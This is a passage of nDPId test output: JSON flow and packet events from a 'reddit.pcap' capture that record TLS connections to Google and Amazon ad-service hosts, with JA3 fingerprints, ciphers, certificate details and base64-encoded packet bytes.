{"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9086,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605291690402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690402,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvnyP\/5OOmbspwyoBJXgGsCAAACBAV4AQMDAwQCCArC10mUDGYnKw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9087,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1605291690402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690402,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDL\/+TjqgBAB++8BAAABAQgKDGYnPcLXSZQ="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690405,"flow_last_seen":1605291690405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690405,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605291690405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690405,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15YAAAAAoAL9IOjCAAACBAWgBAIICgKUPwEAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690421,"flow_last_seen":1605291690421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1605291690421,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690421,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYMAAAAAoAL9IIEIAAACBAWgBAIICl8E6ogAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9093,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690440,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADRffKUqAcsBIEmLB5kd7IUo3\/YpAbu2Nv\/zx++bDteXoBJXgLoLAAACBAV4AQMDAwQCCArC10m3ApQ\/AQ=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690440,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15f\/88fwgBAB+z36AAABAQgKApQ\/JMLXSbc="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9098,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690449,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvo6PvOtUOc0w2EoBJXgGkiAAACBAV4AQMDAwQCCArC10m3XwTqiA=="} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690449,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYT7zrVEgBAB++0WAAABAQgKXwTqpcLXSbc="} -01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dQAAAAAoAL9IKwyAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReQAAAAAoAL9IG1mAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s24AAAAAoAL9IHV1AAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOkAAAAAoAL9INfoAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFQAAAAAoAL9IB2IAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygYAAAAAoAL9IOOcAAACBAWgBAIICqpUDK0AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9285,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9285,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtsAAAAAoAL9IO7kAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9286,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9286,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns154AAAAAoAL9IJ6VAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9287,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9287,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUEAAAAAoAL9IA5NAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyUAAAAAoAL9ILYPAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} 